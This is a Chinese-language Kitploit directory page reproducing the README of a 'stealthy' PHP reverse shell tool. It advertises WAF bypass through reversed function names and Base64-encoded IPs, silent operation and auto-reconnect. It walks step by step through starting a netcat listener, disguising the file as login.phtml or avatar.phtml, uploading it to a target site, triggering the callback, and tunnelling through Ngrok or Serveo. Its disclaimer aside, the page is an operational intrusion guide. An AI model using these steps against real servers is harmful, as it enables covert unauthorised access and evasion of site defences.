Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Payload生成IDS/IPS规避Web应用程序漏洞利用WAF绕过渗透测试命令与控制学习与教育红队远程访问工具
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

这是一个功能强大且隐蔽的 PHP 反向 Shell,专为道德黑客和渗透测试而设计。它能够建立一条可靠且静默的连接回连到您的机器。

111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

PHP 反向Shell (强大且隐蔽)

这是一个专为道德黑客和渗透测试设计的强大且隐蔽的 PHP 反向Shell。 它能够建立一条可靠且安静的回连通道到您的机器。

⚠️ 免责声明

此 PHP 反向Shell 严格仅用于教育和授权的渗透测试目的。
开发者对使用此 反向Shell 进行的任何滥用、损害或非法活动概不负责。
请负责任地使用,仅限您拥有或获得明确许可的系统。未经授权的访问是违法的,并将受到法律制裁。

特性

  • IP 和 Shell 命令经过 Base64 编码,实现隐身

  • 函数名被反转以绕过 WAF 和安全过滤器

  • 静默模式——不显示任何输出以避免检测

  • 连接断开后自动重连

  • 可作为后台守护进程运行(如果服务器支持)

  • 适用于大多数启用 PHP 的服务器

  • 支持 Ngrok、Serveo 等隧道服务

  • 使用 .phtml 扩展名上传以绕过部分过滤器

使用方法

1. 在您的机器上启动监听器

root@kitploit:~
nc -lvnp 4444

2. 将您的 IP 或主机名编码为 Base64

使用以下简单命令:

root@kitploit:~
echo "your_ip_or_hostname" | base64

示例:

root@kitploit:~
echo "192.168.1.5" | base64

复制输出结果,并替换 PHP 反向Shell 脚本中的 $ip_b64 值。

3. 更新您的 PHP 反向Shell 脚本:

将以下行替换为您的 Base64 编码后的 IP/主机名和端口:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. 重命名文件并上传

将文件重命名为一个不太可疑的名称,例如:

  • login.phtml

  • avatar.phtml

  • update.phtml

使用 .phtml 扩展名有助于在某些禁止 .php 的服务器上运行文件。

将此文件上传到允许文件上传的目标网站。

5. 触发反向Shell

在浏览器中打开上传的文件:

root@kitploit:~
http://target.com/uploads/login.phtml

打开后,您的监听器将获得一个反向Shell连接。

使用隧道(当您的 IP 非公网时)

如果您使用的是移动数据或处于路由器(NAT)后方,您的 IP 可能不是公网 IP。 在这种情况下,反向Shell无法直接到达您的机器。

为了解决这个问题,请使用 TCP 隧道工具,如 Ngrok 或 Serveo。

Ngrok(推荐)

安装 Ngrok
运行以下命令:

root@kitploit:~
ngrok tcp 4444

它将显示类似:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

更新您的 PHP 反向Shell 脚本:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

启动您的监听器:

root@kitploit:~
nc -lvnp 4444

Serveo

运行以下命令:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

它会显示类似:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

更新您的 PHP 反向Shell 脚本:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

启动您的监听器:

root@kitploit:~
nc -lvnp 4444

许可证

本项目采用 GNU 通用公共许可证 v3.0 授权。

下载工具